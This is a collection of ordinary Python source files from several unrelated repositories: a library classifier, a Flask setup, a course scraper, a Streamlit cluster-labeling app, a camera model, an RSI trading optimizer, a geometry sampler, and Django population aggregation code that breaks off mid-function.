title_features, title_names = featurize_column(\n tokenize_column(df['title'].fillna(''), tokenizer),\n # token_pattern=r\"[^\\| ]+\", \n max_features=5000)\n\n publisher_features, publisher_names = featurize_column(\n tokenize_column(df['publisher'].fillna(''), tokenizer),\n # token_pattern=r\"[^\\| ]+\",\n max_features=5000)\n\n language_features, language_names = featurize_column(\n tokenize_column(df['language_text'].fillna(''), tokenizer),\n max_features=1000)\n\n features = hstack(\n [joined_features, title_features, publisher_features, language_features])\n names = joined_names + title_names + publisher_names + language_names\n\n return features.tocsr(), names\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--train-data', required=True)\n parser.add_argument('--dev-data', required=True)\n parser.add_argument('--max-level', type=int, default=0)\n parser.add_argument('--label-hierarchy', default='./data/label-hierarchy.tsv')\n parser.add_argument('--output-path', default='./linear_multilabel.preds')\n args = parser.parse_args()\n\n # class Object():\n # pass\n # args = Object()\n # args.label_hierarchy = '../data/label-hierarchy.tsv'\n # args.train_data = '../data/1980_2019_data.train.parquet'\n # args.dev_data = '../data/1980_2019_data.dev.parquet'\n # args.max_level = 2\n\n hierarchy = pd.read_csv(args.label_hierarchy, sep='\\t')\n if args.train_data.endswith('.parquet'):\n train = pd.read_parquet(args.train_data)\n else:\n train = pd.read_csv(args.train_data)\n if args.dev_data.endswith('.parquet'):\n dev = pd.read_parquet(args.dev_data)\n else:\n dev = pd.read_csv(args.dev_data)\n\n # map labels\n if args.max_level > 0:\n mapping = map_to_max_level(hierarchy, args.max_level)\n train['BK_split'] = train['BK_split'].apply(lambda row: tuple(set(map(mapping.get, row))))\n dev['BK_split'] = dev['BK_split'].apply(lambda row: tuple(set(map(mapping.get, row))))\n\n # filter languages\n target_languages = train['language_text'].value_counts()[\n list(train['language_text'].value_counts() > 1000)\n ].keys()\n target_languages = [lang for lang in target_languages if '|' not in lang]\n train = train[train['language_text'].isin(target_languages)]\n dev = dev[dev['language_text'].isin(target_languages)]\n\n tokenizer = BertTokenizer.from_pretrained(\"bert-base-multilingual-uncased\")\n features, names = process_data(pd.concat([train, dev]), tokenizer)\n features = features.tocsr()\n\n train_X, dev_X = features[:len(train)], features[len(train):]\n train_y = train['BK_split'].tolist()\n dev_y = dev['BK_split'].tolist()\n\n mlb = MultiLabelBinarizer()\n y = mlb.fit_transform(train_y + dev_y)\n train_y, dev_y = y[:len(train)], y[len(train):]\n print(\"Training with {} labels\".format(len(mlb.classes_)))\n clf = OneVsRestClassifier(LinearSVC())\n clf.fit(train_X, train_y)\n\n # evaluate\n preds = clf.predict(dev_X)\n print(json.dumps(get_metrics(dev_y, preds)))\n with open(args.output_path, 'wb') as f:\n np.savez(f, preds=preds, dev_y=dev_y, index=dev.index)\n with open(args.output_path + '.label_mapping', 'wb') as f:\n pkl.dump(mlb, f)","repo_name":"morethanbooks/library_classification_rom","sub_path":"code/linear_multilabel.py","file_name":"linear_multilabel.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10830951725","text":"\"\"\"Instantiate Flask and set up plugins\"\"\"\n\nimport os\nfrom datetime import timedelta\n\nfrom flask import Flask\n\nfrom flask_session import Session\nfrom tbj_statsapp.config import (\n DevelopmentConfig,\n ProductionConfig,\n TestingConfig,\n)\n\n\nclass ConfigException(Exception):\n \"\"\"Exception raised for invalid configurations\n\n Attributes:\n message -- explanation of why config is invalid\n \"\"\"\n\n def __init__(self, message):\n Exception.__init__(self)\n self.message = message\n\n\n# Grab environment\nFLASK_ENV = os.environ.get(\"FLASK_ENV\", False)\nDEBUG = os.environ.get(\"FLASK_DEBUG\", False)\nTESTING = os.environ.get(\"FLASK_TESTING\", False)\n\nif DEBUG:\n config_settings = DevelopmentConfig()\nelif TESTING:\n config_settings = TestingConfig()\nelif not DEBUG and not TESTING:\n config_settings = ProductionConfig()\nelse:\n raise ConfigException(\"Improper environment configured\")\n\n\ndef create_app():\n \"\"\"Create and initialize app according to the config\"\"\"\n app = Flask(__name__)\n app.config.from_object(config_settings)\n\n # Cookie settings - same across all settings\n app.config[\"SESSION_TYPE\"] = \"filesystem\"\n app.config[\"SESSION_PERMANENT\"] = True\n app.config[\"PERMANENT_SESSION_LIFETIME\"] = timedelta(hours=6)\n\n Session(app)\n\n # Route views without Flask blueprints\n with app.app_context():\n from tbj_statsapp import views # noqa: F401\n\n # Setup session\n\n return app\n\n\nif __name__ == \"__main__\":\n create_app().run(debug=True)\n","repo_name":"kaitj/tbj-statsapp","sub_path":"tbj_statsapp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12397763739","text":"#!/usr/bin/env python\n\"\"\"\nPython routines for scraping data from Princeton's registrar.\nby Alex Ogier '13.\n\nKept limping along by Brian Kernighan, with bandaids every year\nas the registrar makes format changes.\n\nModified by TigerPath Team\n\"\"\"\n\nimport re\nimport urllib.request\nfrom http.client import RemoteDisconnected\nfrom bs4 import BeautifulSoup\n\nURL_PREFIX = \"http://registrar.princeton.edu/course-offerings/\"\nCOURSE_URL = URL_PREFIX + \"course_details.xml?courseid={courseid}&term={term}\"\nCOURSE_URL_REGEX = re.compile(r\"courseid=(?P\\d+)\")\n\n\ndef clean(str):\n \"\"\"Return a string with leading and trailing whitespace gone and all other whitespace condensed to a single space.\"\"\"\n return re.sub(\"\\s+\", \" \", str.strip())\n\n\ndef get_course_details(soup):\n \"\"\"Returns a dict of {courseid, area}.\"\"\"\n\n area = clean(soup(\"strong\")[1].findAllNext(text=True)[1]) # balanced on a pinhead\n if re.match(r\"^\\((LA|SA|HA|EM|EC|QR|STN|STL)\\)$\", area):\n area = area[1:-1]\n else:\n area = \"\"\n\n return {\n \"courseid\": COURSE_URL_REGEX.search(\n soup.find(\"a\", href=COURSE_URL_REGEX)[\"href\"]\n ).group(\"id\"),\n \"area\": area, # bwk: this was wrong[1:-1], # trim parens # match.group(1) if match != None else ''\n }\n\n\ndef scrape_page(page):\n \"\"\"Returns a dict containing as much course info as possible from the HTML contained in page.\"\"\"\n soup = BeautifulSoup(page, \"lxml\").find(\n \"div\", id=\"timetable\"\n ) # was contentcontainer\n course = get_course_details(soup)\n return course\n\n\ndef scrape_id(id, TERM_CODE):\n for _ in range(3):\n try:\n page = urllib.request.urlopen(\n COURSE_URL.format(term=TERM_CODE, courseid=id)\n )\n return scrape_page(page)\n except RemoteDisconnected as e:\n print(\"Retrying scraping course id {}\".format(id))\n print(e)\n else:\n break\n else:\n raise Exception(\"Scraping course id {} failed\".format(id))\n","repo_name":"TigerAppsOrg/TigerPath","sub_path":"tigerpath/scraper/scrape_dist_areas.py","file_name":"scrape_dist_areas.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"19"} +{"seq_id":"29586850291","text":"import os, sys\nimport streamlit as st\n\nimport draw, utils\nimport SessionState\n\n\ndef gen_page_content(state, df):\n ''' create Streamlit page \n :param state: SessionState object storing cluster data\n :param df: pandas DataFrame containing ad data '''\n first_col, _, _, _, last_col = st.beta_columns(5)\n with last_col:\n if st.button('View next cluster'):\n try:\n state.cluster = next(state.gen_clusters)\n state.index += 1\n except StopIteration:\n state.is_stop = True\n\n with first_col:\n st.title('Suspicious Meta-Cluster #{}'.format(state.index+1))\n\n # on first iteration, before button press\n if state.is_first:\n next(state.gen_clusters) # TODO: change once scalable\n state.cluster = next(state.gen_clusters)\n state.index += 1\n state.is_first = False\n\n # if we've processed all clusters, we show a static end page\n if state.is_stop:\n st.header(\"You've finished all examples from this dataset. Thank you!\")\n st.balloons()\n return\n\n # feature generation\n subdf = utils.get_subdf(df, state)\n cluster_features, features, metadata_features = utils.cluster_feature_extract(subdf)\n\n left_col, right_col = st.beta_columns((1.25, 3))\n\n # strip plot with heatmap\n with left_col:\n st.write(utils.BUTTON_STYLE, unsafe_allow_html=True) # allows side-by-side button opts\n radio_val = st.radio('Which view would you like to see?', ['By cluster', 'By metadata'])\n\n top_n_params, chart_params = utils.BY_CLUSTER_PARAMS if radio_val == 'By cluster' \\\n else utils.BY_METADATA_PARAMS\n plot_df = cluster_features if radio_val == 'By cluster' else metadata_features\n\n top_df = utils.top_n(plot_df, **top_n_params)\n st.write(draw.strip_plot(top_df, **chart_params))\n\n # template / ad text visualization\n with right_col:\n label = subdf['LSH label'].value_counts().idxmax()\n start_path = '../InfoShield/results/{}'.format(label)\n start_path = './data/example.pkl'\n if not os.path.exists(start_path):\n start_path = './data/example.pkl'\n draw.templates(start_path)\n\n # hacky way to get padding between columns\n left_col, _, mid_col, _, right_col = st.beta_columns((1, 0.1, 1.5, 0.1, 2))\n\n # meta-cluster stats table\n with left_col:\n st.subheader('Meta-Cluster Stats')\n st.table(utils.basic_stats(subdf, columns))\n\n # display features over time, aggregated forall clusters\n with mid_col:\n select_feature = st.selectbox('Choose a feature to look at over time', [f for f in features if f != 'days'])\n if select_feature:\n st.write(draw.time_series(features, select_feature))\n\n # show map of ad locations\n with right_col:\n st.write(draw.map(subdf))\n\n # Number input boxes take up the whole column space -- this makes them shorter\n st.subheader('Labeling: On a scale of 1 (very unlikely) to 5 (very likely), how likely is this to be...')\n label_cols = st.beta_columns(5)\n\n for col, cluster_type in zip(label_cols, ('Trafficking', 'Spam', 'Scam', 'Drug dealer', 'Other')):\n col.write(draw.labeling_buttons(cluster_type))\n\n \n# Generate content for app\nst.set_page_config(layout='wide', page_title='Meta-Clustering Classification')\nstate_params = {\n 'is_first': True,\n 'index': 0,\n 'cluster': set(),\n 'is_stop': False,\n 'gen_clusters': None\n}\nstate = SessionState.get(**state_params)\n\nwith st.spinner('Processing data...'):\n filename = '../tiny-RANDOM.csv'\n columns = ['phone', 'email', 'social', 'image_id']\n df = utils.read_csv(filename)\n\n if state.is_first:\n graph = utils.construct_metaclusters(utils.filename_stub(filename), df, columns)\n state.gen_clusters = utils.gen_ccs(graph)\n\ngen_page_content(state, df)","repo_name":"cfaloutsos/Interactive-Labeling-for-Human-Trafficking","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"24813569591","text":"import numpy as np \nimport cv2\nfrom utils import add_ones\nimport math\n\n\"\"\"\nfx, fy - focal length of the camera in pixel coordinates\ncx, cy - principle point\nD - distortion coefficeints , D = [k1, k2, p1, p2, k3]\n\nby subscribing to the camera/depth/camera_info ros-topic, following parameters are obtained:\n\twidth -> 640\n\theight -> 480\n\tK -> [554.254691191187, 0.0, 320.5, \n\t\t 0.0, 554.254691191187, 240.5,\n\t\t 0.0, 0.0, 1.0]\n\tfx -> 554.254691191187\n\tfy -> 554.254691191187\n\tcx -> 320.5\n\tcy -> 240.5\n\tD -> [0.0, 0.0, 0.0, 0.0, 0.0] \t\n\ndistortion_model: \"plumb_bob\"\nsimple model of radial and tangential distortion\n\"\"\"\n\nclass Camera: \n def __init__(self, width, height, fx, fy, cx, cy, D, fps = 1):\n self.width = width\n self.height = height\n self.fx = fx\n self.fy = fy\n self.cx = cx\n self.cy = cy\n self.D = np.array(D,dtype=np.float32) # np.array([k1, k2, p1, p2, k3]) distortion coefficients \n self.fps = fps \n \n self.is_distorted = np.linalg.norm(self.D) > 1e-10\n\n\n\nclass KinectCamera(Camera):\n def __init__(self, width, height, fx, fy, cx, cy, D, fps = 1):\n super(KinectCamera, self).__init__(width, height, fx, fy, cx, cy, D, fps)\n # K : intrinsic matrix of the camera\n self.K = np.array([[fx, 0,cx],\n [ 0,fy,cy],\n [ 0, 0, 1]])\n self.K_inverted = np.array([[1/fx, 0,-cx/fx],\n [ 0, 1/fy,-cy/fy],\n [ 0, 0, 1]]) \n \n self.u_min, self.u_max = 0, self.width \n self.v_min, self.v_max = 0, self.height \n\n # turn [u,v] -> [x,y,1] -> [x,y] : where x,y are in normalized coordinate system and u,v in pixel coordinate system \n def unproject_points(self, uvs):\n return np.dot(self.K_inverted, add_ones(uvs).T).T[:, 0:2]\n\n # turn [u,v] -> [x,y,z] : Z contains the depth values for each pixels\n def unproject_points_z(self, uvs, Z):\n xyzs = []\n idx_ = []\n for idx in range(uvs.shape[0]):\n z = Z[uvs[idx, 0],uvs[idx, 1]]\n if math.isnan(z) or z==0:\n idx_.append(idx)\n continue\n x = ((uvs[idx, 1] - self.cx) / self.fx) * z\n y = ((uvs[idx, 0] - self.cy) / self.fy) * z\n\n xyzs.append([x, y, z])\n return np.array(xyzs, np.float64), idx_\n\n # turn uvs of Nx2 array into uvs_undistorted of Nx2 \n def undistort_points(self, uvs):\n if self.is_distorted:\n uvs_undistorted = cv2.undistortPoints(np.expand_dims(uvs, axis=1), self.K, self.D, None, self.K) \n return uvs_undistorted.ravel().reshape(uvs_undistorted.shape[0], 2)\n else:\n return uvs \n \n\n \n","repo_name":"ShafeekSaleem/RobotLocalization","sub_path":"src/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9198152025","text":"from EMA import total_weight\nfrom collections import deque\n\n# LBB = Lower bound buy\n# UBB = Upper bound buy\n# LBS = Lower bound sell\n# UBS = Upper bound sell\n\n# Optimizes both the length and bound\ndef complete_optimization(data, length, LBB, UBB, LBS, UBS):\n # Initialize data\n PREV_length, PREV_LBB, PREV_UBB, PREV_LBS, PREV_UBS = -1,-1,-1,-1,-1\n UNSTABLE = (length != PREV_length or LBB != PREV_LBB or UBB != PREV_UBB or PREV_LBS != LBS or PREV_UBS != UBS)\n\n while UNSTABLE:\n PREV_length = length\n PREV_LBB = LBB\n PREV_UBB = UBB\n PREV_LBS = LBS\n PREV_UBS = UBS\n\n length, profit = length_optimization(data, LBB, UBB, LBS, UBS)\n LBB, UBB, LBS, UBS, profit = bound_optimization(data, length)\n\n UNSTABLE = (length != PREV_length or LBB != PREV_LBB or UBB != PREV_UBB or PREV_LBS != LBS or PREV_UBS != UBS)\n \n return {\"profit\": profit, \"length\": length, \"LBB\": LBB, \"UBB\" : UBB, \"LBS\" : LBS, \"UBS\": UBS}\n\n# Optimizes the length \ndef length_optimization(data, LBB, UBB, LBS, UBS): #length is temporary\n # Initialize data\n MAX_profit, OPT_length = -1, -1\n\n for length in range(7, 25):\n RSI, gains, loss = initialize(data, length)\n balance, num_of_trades = trading(data, RSI, gains, loss, length, LBB, UBB, LBS, UBS)\n\n if balance > MAX_profit:\n MAX_profit = balance\n OPT_length = length\n \n return OPT_length, MAX_profit\n\n# Optimizes the bounds\ndef bound_optimization(data, length):\n MAX_profit, OPT_LBB, OPT_UBB, OPT_LBS, OPT_UBS = -1, -1, -1, -1, -1\n LBB_start = 30\n UBB_start = 70\n LBS_start = 45\n UBS_start = 55\n for i in range(16):\n for j in range(16):\n LBB = LBB_start - i\n UBB = UBB_start + i\n LBS = LBS_start - j\n UBS = UBS_start + j\n RSI, gains, loss = initialize(data, length)\n profit, num_of_trades = trading(data, RSI, gains, loss, length, LBB, UBB, LBS, UBS)\n\n if profit > MAX_profit:\n MAX_profit = profit\n OPT_LBB = LBB\n OPT_UBB = UBB\n OPT_LBS = LBS\n OPT_UBS = UBS\n\n return OPT_LBB, OPT_UBB, OPT_LBS, OPT_UBS, MAX_profit\n\n# Initializes the the RSI queue\ndef initialize(data, length):\n gains, loss = deque(maxlen=length), deque(maxlen=length)\n for i in range(1, length+1):\n change = data[i][\"close\"] - data[i-1][\"close\"]\n if change > 0:\n gains.appendleft(change)\n loss.appendleft(0)\n else:\n gains.appendleft(0)\n loss.appendleft(change)\n\n avg_up = RMA(gains, 1)\n avg_down = RMA(loss, 1) + 0.00001\n RS = avg_up / (-1 * avg_down)\n\n RSI = 100 - (100 / (1 + RS))\n return RSI, gains, loss\n\n# RMA function\ndef RMA(data, weight):\n sum = 0\n for i in range(len(data)):\n alpha = 1/(i + 1)\n sum = alpha * data[i] + (1 - alpha) * sum\n return sum\n\n# Calculates the RSI with the next element\ndef calc_next(data, gains, loss, next):\n change = data[next][\"close\"] - data[next - 1][\"close\"]\n if change > 0:\n gains.appendleft(change)\n loss.appendleft(0)\n else:\n gains.appendleft(0)\n loss.appendleft(change)\n\n avg_up = RMA(gains, 1)\n avg_down = RMA(loss, 1) + 0.00001\n RS = avg_up / (-1 * avg_down) \n RSI = 100 - (100 / (1 + RS))\n\n return RSI, gains, loss\n\n# Simulates the trading\ndef trading(data, RSI, gains, loss, length, LBB, UBB, LBS, UBS):\n position = None\n short = -1\n long = 1\n purchases, profit = 0, 0\n for i in range(length, len(data)):\n\n if position == None:\n if RSI < LBB:\n position = long\n profit -= data[i][\"close\"]\n purchases += 1\n\n if RSI > UBB:\n position = short\n profit += data[i][\"close\"]\n purchases += 1\n\n if position == long and RSI > UBS:\n profit += data[i][\"close\"]\n position = None\n\n if position == short and RSI < LBS:\n profit -= data[i][\"close\"]\n position = None\n\n RSI, gains, loss = calc_next(data, gains, loss, i)\n\n if position == long:\n profit += data[len(data) - 1][\"close\"]\n elif position == short:\n profit -= data[len(data) - 1][\"close\"]\n \n return profit, purchases","repo_name":"DenizTekciftci/tradeOptimizer","sub_path":"RSI.py","file_name":"RSI.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3893972208","text":"import config\nfrom gfx import uniform_sphere, unit, uniform_theta\n\nimport numpy as np\n\nfrom abc import ABCMeta, abstractmethod\n\n\nclass Geometry(config.Element):\n '''\n A distribution of points and directions. Meant for modelling sensors and\n emitters.\n '''\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def choose(self, rng):\n '''\n Pick a random point and direction defined by the geometry.\n\n Parameters:\n rng (Random): a random number generator\n\n Returns:\n point: numpy.ndarray a point in 3-space on the geometry\n direction: numpy.ndarray a direction in 3-space on the geometry\n\n '''\n raise NotImplementedError\n\n\nclass Ray(Geometry):\n '''\n Always returns `origin` and `direction` for `choose()`.\n '''\n\n def __init__(self, origin, direction):\n self.origin = np.asarray(origin)\n self.direction = np.asarray(direction)\n\n def choose(self, _):\n return np.array(self.origin), np.array(self.direction)\n\n def to_dict(self):\n return {\n 'type': self.get_type(),\n 'origin': self.origin.tolist(),\n 'direction': self.direction.tolist(),\n }\n\n\nclass Sphere(Geometry):\n '''\n Returns points on the sphere and surface normal at that point. Supports\n spherical uniform sampling and \"theta-uniform\" sampling.\n\n Parameters\n ----------\n\n radius: float\n the radius of the sphere\n center: array of size 3\n the center of the sphere\n basis: 3x3 matrix or none\n a 3d rotation matrix for the sphere; by the default the sphere's pole\n is in the x direction\n fov: float\n angle from the pole to support; by default the entire sphere (pi)\n uniform_in: str\n sampling strategy; either 'sphere' or 'theta'\n '''\n\n def __init__(self, radius, center=(0, 0, 0), basis=None, fov=np.pi,\n uniform_in='sphere'):\n self.center = np.asarray(center)\n self.radius = radius\n if basis is None:\n basis = np.eye(3)\n self.basis = np.asarray(basis)\n self.fov = fov\n self.uniform_in = uniform_in\n\n def choose(self, rng):\n if self.uniform_in == 'sphere':\n xform = np.dot(self.basis, uniform_sphere(rng, self.fov))\n elif self.uniform_in == 'theta':\n xform = np.dot(self.basis, uniform_theta(rng, self.fov))\n else:\n raise ValueError('Invalid uniform_in value: %s' % self.uniform_in)\n point = self.center + self.radius * xform\n direction = unit(point - self.center)\n return point, direction\n\n def to_dict(self):\n return {\n 'type': self.get_type(),\n 'center': self.center.tolist(),\n 'direction': self.direction.tolist(),\n 'fov': self.fov,\n 'basis': self.basis.tolist(),\n 'uniform_in': self.uniform_in,\n }\n","repo_name":"BrennenTaylor/Twisty","sub_path":"python/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"37406562644","text":"from typing import List\n\n\nimport pandas as pd\nimport numpy as np\nfrom django.db import connection, transaction\nfrom django.db.utils import ProgrammingError\nfrom django.db.models import Max, Sum, F\nfrom django.conf import settings\n\nfrom datentool_backend.area.models import Area, AreaLevel\nfrom datentool_backend.population.models import (\n PopulationRaster,\n AreaCell,\n Population,\n PopulationAreaLevel,\n AreaPopulationAgeGender,\n RasterCellPopulationAgeGender,\n RasterCellPopulation)\nfrom datentool_backend.utils.raw_delete import delete_chunks\nfrom datentool_backend.utils.excel_template import write_template_df\n\nimport logging\nlogger = logging.getLogger('population')\n\n\ndef disaggregate_population(population: Population,\n use_intersected_data: bool=False,\n drop_constraints: bool=False):\n areas = population.populationentry_set.distinct('area_id')\\\n .values_list('area_id', flat=True)\n if not areas:\n return 'skipped'\n\n popraster = population.popraster or PopulationRaster.objects.first()\n\n ac = AreaCell.objects.filter(area__in=areas,\n rastercellpop__popraster=popraster)\n\n # if rastercells are not intersected yet\n if ac and use_intersected_data:\n msg = 'use precalculated rastercells\\n'\n else:\n intersect_areas_with_raster(Area.objects.filter(id__in=areas),\n pop_raster=population.popraster)\n msg = f'{len(areas)} Areas intersected with Rastercells.\\n'\n ac = AreaCell.objects.filter(area__in=areas,\n rastercellpop__popraster=population.popraster)\n if not ac:\n return 'no area cells found to intersect with'\n\n # get the intersected data from the database\n df_area_cells = pd.DataFrame.from_records(\n ac.values('rastercellpop__cell_id', 'area_id', 'share_cell_of_area'))\\\n .rename(columns={'rastercellpop__cell_id': 'cell_id', })\n\n # take the Area population by age_group and gender\n entries = population.populationentry_set\n df_pop = pd.DataFrame.from_records(\n entries.values('area_id', 'gender_id', 'age_group_id', 'value'))\n\n # left join with the shares of each rastercell\n dd = df_pop.merge(df_area_cells,\n on='area_id',\n how='left')\\\n .set_index(['cell_id', 'gender_id', 'age_group_id'])\n\n # areas without rastercells have no cell_id assigned\n cell_ids = dd.index.get_level_values('cell_id')\n has_no_rastercell = pd.isna(cell_ids)\n population_not_located = dd.loc[has_no_rastercell].value.sum()\n\n if population_not_located:\n area_levels = population.populationentry_set\\\n .distinct('area__area_level_id')\\\n .values('area__area_level')\n area_level = area_levels[0]['area__area_level']\n\n areas_without_rastercells = Area\\\n .label_annotated_qs(area_level)\\\n .filter(id__in=dd.loc[has_no_rastercell, 'area_id'])\\\n .values_list('_label', flat=True)\n\n msg += f'{population_not_located} Inhabitants not located '\\\n f'to rastercells in {list(areas_without_rastercells)}\\n'\n else:\n msg += 'all areas have rastercells with inhabitants\\n'\n\n # can work only when rastercells are found\n dd = dd.loc[~has_no_rastercell]\n\n # population by age_group and gender in each rastercell\n dd.loc[:, 'pop'] = dd['value'] * dd['share_cell_of_area']\n\n # has to be summed up by rastercell, age_group and gender, because a rastercell\n # might have population from two areas\n df_cellagegender: pd.DataFrame = dd['pop']\\\n .groupby(['cell_id', 'gender_id', 'age_group_id'])\\\n .sum()\\\n .rename('value')\\\n .reset_index()\n\n df_cellagegender['cell_id'] = df_cellagegender['cell_id'].astype('i8')\n df_cellagegender['population_id'] = population.id\n\n # delete the existing entries\n # updating would leave values for rastercells, that do not exist any more\n rc_exist = RasterCellPopulationAgeGender.objects\\\n .filter(population=population)\n delete_chunks(rc_exist, logger)\n\n model = RasterCellPopulationAgeGender\n model_name = model._meta.object_name\n n_rows = len(df_cellagegender)\n logger.debug(f'Schreibe {n_rows:n} Einträge')\n stepsize = settings.STEPSIZE\n for i in np.arange(0, n_rows, stepsize, dtype=np.int64):\n chunk = df_cellagegender.iloc[i:i + stepsize]\n n_inserted = len(chunk)\n write_template_df(chunk, model, logger,\n drop_constraints=drop_constraints,\n log_level=logging.DEBUG)\n logger.info(f'{i + n_inserted:n}/{n_rows:n} {model_name}-Einträgen geschrieben')\n\n return msg\n\n\ndef intersect_areas_with_raster(\n areas: List[Area],\n pop_raster: PopulationRaster=None,\n drop_constraints: bool=False):\n '''\n intersect areas with raster creating AreaCells in database,\n already existing AreaCells for areas in this raster are dropped\n '''\n\n if not pop_raster:\n pop_raster = PopulationRaster.objects.first()\n if not pop_raster:\n return\n\n # use only cells with population and put values from Census to column pop\n raster_cells = pop_raster.raster.rastercell_set\n\n raster_cells_with_inhabitants = raster_cells\\\n .filter(rastercellpopulation__isnull=False)\\\n .annotate(pop=F('rastercellpopulation__value'),\n rcp_id=F('rastercellpopulation__id'),\n )\n\n # spatial intersect with areas from given area_level\n area_tbl = Area._meta.db_table\n\n rr = raster_cells_with_inhabitants.extra(\n select={f'area_id': f'\"{area_tbl}\".id',\n f'm2_raster': 'st_area(st_transform(poly, 3035))',\n f'm2_intersect': f'st_area(st_transform(st_intersection(poly, \"{area_tbl}\".geom), 3035))',\n },\n tables=[area_tbl],\n where=[f'''st_intersects(poly, \"{area_tbl}\".geom)\n AND \"{area_tbl}\".id IN %s\n '''],\n params=(tuple(areas.values_list('id', flat=True)),),\n )\n\n # ToDo: do intersection first to check number of areas that intersect with\n # raster, causes error if no area intersects with raster\n try:\n if not rr:\n return\n except ProgrammingError:\n return\n\n df = pd.DataFrame.from_records(\n rr.values('id', 'area_id', 'pop', 'rcp_id',\n 'm2_raster', 'm2_intersect', 'cellcode'))\\\n .set_index(['id', 'area_id'])\n\n df['share_area_of_cell'] = df['m2_intersect'] / df['m2_raster']\n\n # calculate weight as Census-Population *\n # share of area of the total area of the rastercell\n df['weight'] = df['pop'] * df['m2_intersect'] / df['m2_raster']\n\n # sum up the weights of all rastercells in an area\n area_weight = df['weight'].groupby(level='area_id').sum().rename('total_weight')\n\n # calculate the share of population, a rastercell\n # should get from the total population\n df = df.merge(area_weight, left_on='area_id', right_index=True)\n df['share_cell_of_area'] = df['weight'] / df['total_weight']\n\n # sum up the weights of all areas in a cell\n cell_weight = df['weight'].groupby(level='id').sum().rename('total_weight_cell')\n\n df = df.merge(cell_weight, left_on='id', right_index=True)\n df['share_area_of_cell'] = df['weight'] / df['total_weight_cell']\n\n df2 = df[['rcp_id', 'share_area_of_cell', 'share_cell_of_area']]\\\n .reset_index()\\\n .rename(columns={'rcp_id': 'rastercellpop_id'})[\n ['area_id', 'rastercellpop_id', 'share_area_of_cell', 'share_cell_of_area']]\n\n ac = AreaCell.objects.filter(area__in=areas, rastercellpop__popraster=pop_raster)\n delete_chunks(ac, logger)\n\n model = AreaCell\n model_name = model._meta.object_name\n n_rows = len(df2)\n logger.debug(f'Schreibe insgesamt {n_rows:n} Einträge')\n stepsize = settings.STEPSIZE\n for i in np.arange(0, n_rows, stepsize, dtype=np.int64):\n chunk = df2.iloc[i:i + stepsize]\n n_inserted = len(chunk)\n write_template_df(chunk, model, logger,\n drop_constraints=drop_constraints,\n log_level=logging.DEBUG)\n logger.info(f'{i + n_inserted:n}/{n_rows:n} {model_name}-Einträgen geschrieben')\n\n\ndef aggregate_many(area_levels, populations, drop_constraints=False):\n\n manager = AreaPopulationAgeGender.copymanager\n with transaction.atomic():\n if drop_constraints:\n manager.drop_constraints()\n manager.drop_indexes()\n\n for i, area_level in enumerate(area_levels):\n for population in populations:\n aggregate_population(area_level, population,\n drop_constraints=False)\n entries = AreaPopulationAgeGender.objects.filter(\n area__area_level=area_level)\n summed_values = entries.values(\n 'population__year', 'area', 'population__prognosis')\\\n .annotate(Sum('value'))\n max_value = summed_values.aggregate(\n Max('value__sum'))['value__sum__max']\n area_level.max_population = max_value\n area_level.population_cache_dirty = False\n area_level.save()\n logger.info(f'Daten auf Gebietseinheit {area_level.name} aggregiert '\n f'{i + 1}/{len(area_levels)}')\n\n if drop_constraints:\n manager.restore_constraints()\n manager.restore_indexes()\n\n\ndef aggregate_population(area_level: AreaLevel, population: Population,\n drop_constraints=False):\n acells = AreaCell.objects.filter(area__area_level=area_level)\n\n rasterpop = RasterCellPopulationAgeGender.objects.filter(population=population)\n rcp = RasterCellPopulation.objects.all()\n\n q_acells, p_acells = acells.values(\n 'area_id', 'rastercellpop_id', 'share_area_of_cell').query.sql_with_params()\n q_pop, p_pop = rasterpop.values(\n 'population_id', 'cell_id', 'value', 'age_group_id', 'gender_id')\\\n .query.sql_with_params()\n q_rcp, p_rcp = rcp.values(\n 'id', 'cell_id').query.sql_with_params()\n\n query = f'''SELECT\n p.\"population_id\",\n ac.\"area_id\",\n p.\"age_group_id\",\n p.\"gender_id\",\n SUM(p.\"value\" * ac.\"share_area_of_cell\") AS \"value\"\n FROM\n ({q_acells}) AS ac,\n ({q_pop}) AS p,\n ({q_rcp}) AS rcp\n WHERE ac.\"rastercellpop_id\" = rcp.\"id\"\n AND p.\"cell_id\" = rcp.\"cell_id\"\n GROUP BY p.\"population_id\", ac.\"area_id\", p.\"age_group_id\", p.\"gender_id\"\n '''\n\n params = p_acells + p_pop + p_rcp\n\n columns = ['population_id', 'area_id', 'age_group_id', 'gender_id', 'value']\n\n with connection.cursor() as cursor:\n cursor.execute(query, params)\n rows = cursor.fetchall()\n df_areaagegender = pd.DataFrame(rows, columns=columns)\n\n ap_exist = AreaPopulationAgeGender.objects\\\n .filter(population=population, area__area_level=area_level)\n delete_chunks(ap_exist, logger)\n\n model = AreaPopulationAgeGender\n model_name = model._meta.object_name\n n_rows = len(df_areaagegender)\n logger.debug(f'Schreibe insgesamt {n_rows:n} Einträge')\n stepsize = settings.STEPSIZE\n for i in np.arange(0, n_rows, stepsize, dtype=np.int64):\n chunk = df_areaagegender.iloc[i:i + stepsize]\n n_inserted = len(chunk)\n write_template_df(chunk, model, logger,\n drop_constraints=drop_constraints,\n log_level=logging.DEBUG)\n logger.debug(f'{i + n_inserted:n}/{n_rows:n} {model_name}-Einträgen geschrieben')\n\n # validate_cache\n pop_arealevel, created = PopulationAreaLevel.objects.get_or_create(\n population=population,\n area_level=area_level)\n 